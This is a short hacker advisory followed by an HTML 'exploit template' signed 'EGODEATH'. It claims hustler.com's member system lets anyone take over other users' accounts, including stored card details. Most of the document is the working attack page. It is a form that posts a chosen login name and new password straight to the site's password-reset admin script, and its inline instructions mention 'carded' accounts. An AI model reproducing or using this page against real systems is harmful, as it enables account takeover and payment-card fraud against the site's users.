security vulnerability in hustler.com which allows any user to 
steal another users account and gain access to full access to 
their account including cc# information

no fix yet. hustler.com has been informed.

----------------------------------------------------------------------------
exploit template
----------------------------------------------------------------------------

<!--       E     G    0    D    3    A    T     H                   -->
<HTML>
<HEAD><TITLE>HUSTLER LOGIN THEIF BY EGODEATH</TITLE></HEAD>
<BODY bgcolor=#000000 text=#FFFFFF>

<table border="0">
<th><font colo<b><u>HACKED</b></u>
</table>
<H2>Change My Password - ego's M0D1Fi3D verzi0n</H2>

<FORM METHOD="POST" ACTION="https://members.flyntdigital.com/secure-bin/usr_search_admin/resetpass.pl">

<TABLE BORDER=1 CELLSPACING=0 CELLPADDING=4 WIDTH=500>

<TR>
   <TH VALIGN=TOP WIDTH=40% ALIGN=RIGHT>Highlight the User ID: </TH>
   <TD>
      <font color=red>This is the hustler account thief script<br>in order for this to work you must know<br>somones real login name ( if its an old carded<br> account with a nick like XTC, give up<br> you cant steal a froozen account, but<br> yea.. u can change its password...</font> 
      <input type="text" NAME="usr_login" value="a real login name">
   </TD>
</TR>
<TR>
<TD align=left>Enter Your New Password</TD>
<TD align=right>Enter Password again</TD>
</TR>
<TR>
<TD ALIGN=left>
<INPUT TYPE="text" NAME="pass_wd1" VALUE="">
</TD>
<TD align=right>
<INPUT TYPE="text" NAME="pass_wd2" VALUE="">
</TD>
</TR>
<TR>
   <TD COLSPAN=2 ALIGN=CENTER>
      <INPUT TYPE="submit" NAME="submit" VALUE="Submit">
      <INPUT TYPE="reset" NAME="reset" VALUE="Reset">
   </TD>
</TR>
</TABLE>
</FORM>

</BODY>
</HTML>